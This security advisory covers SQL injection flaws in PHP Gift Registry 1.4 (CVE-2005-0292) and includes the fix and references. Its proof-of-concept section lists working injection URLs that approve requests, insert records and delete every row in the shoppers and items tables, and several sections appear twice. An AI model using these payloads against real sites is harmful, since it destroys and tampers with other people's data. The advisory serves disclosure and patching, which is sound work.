PHP Gift Registry Multiple SQL Injection Vulnerabilities
BID:12289
Info
PHP Gift Registry Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 12289 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0292 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 17 2005 12:00AM |
| Updated: | Jul 12 2009 10:06AM |
| Credit: | Discovery of this vulnerability is credited to Madelman <[email protected]>. |
| Vulnerable: |
PHP Gift Registry phpgiftreg 1.4 |
| Not Vulnerable: |
PHP Gift Registry phpgiftreg 1.5 b1 |
Discussion
PHP Gift Registry Multiple SQL Injection Vulnerabilities
PHP Gift Registry is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before being used in SQL queries.
It is reported that successful exploitation could result in a compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
PHP Gift Registry is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before being used in SQL queries.
It is reported that successful exploitation could result in a compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
PHP Gift Registry Multiple SQL Injection Vulnerabilities
No exploit is required and the following proof of concepts were provided by the discoverer of this vulnerability:
Acknowledge all messages
http://www.example.com/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1
Approve all pending requests
http://www.example.com/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1
Decline all pending requests
http://www.example.com/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1
Inserts current shopper for buying to user 3 without need for approval
http://www.example.com/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100
Delete all data from table shoppers
http://www.example.com/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1
Delete all data from table items
http://www.example.com/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1
No exploit is required and the following proof of concepts were provided by the discoverer of this vulnerability:
Acknowledge all messages
http://www.example.com/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1
Approve all pending requests
http://www.example.com/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1
Decline all pending requests
http://www.example.com/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1
Inserts current shopper for buying to user 3 without need for approval
http://www.example.com/phpgiftreg/index.php?action=request&shopfor=3%2c0%29%2c%2899%2c100
Delete all data from table shoppers
http://www.example.com/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1
Delete all data from table items
http://www.example.com/phpgiftreg/item.php?action=delete&itemid=3%20OR%201%3d1
Solution / Fix
PHP Gift Registry Multiple SQL Injection Vulnerabilities
Solution:
The vendor has released phpgiftreg 1.5.0 b1 to address these issues.
PHP Gift Registry phpgiftreg 1.4
Solution:
The vendor has released phpgiftreg 1.5.0 b1 to address these issues.
PHP Gift Registry phpgiftreg 1.4
-
PHP Gift Registry phpgiftreg-1.5.0b1.tar.gz
http://prdownloads.sourceforge.net/phpgiftreg/phpgiftreg-1.5.0b1.tar.g z?download
References
PHP Gift Registry Multiple SQL Injection Vulnerabilities
References:
References:
- Homepage (PHP Gift Registry)
- phpGiftReq SQL Injection (Madelman
- Re: phpGiftReq SQL Injection (Ryan Walberg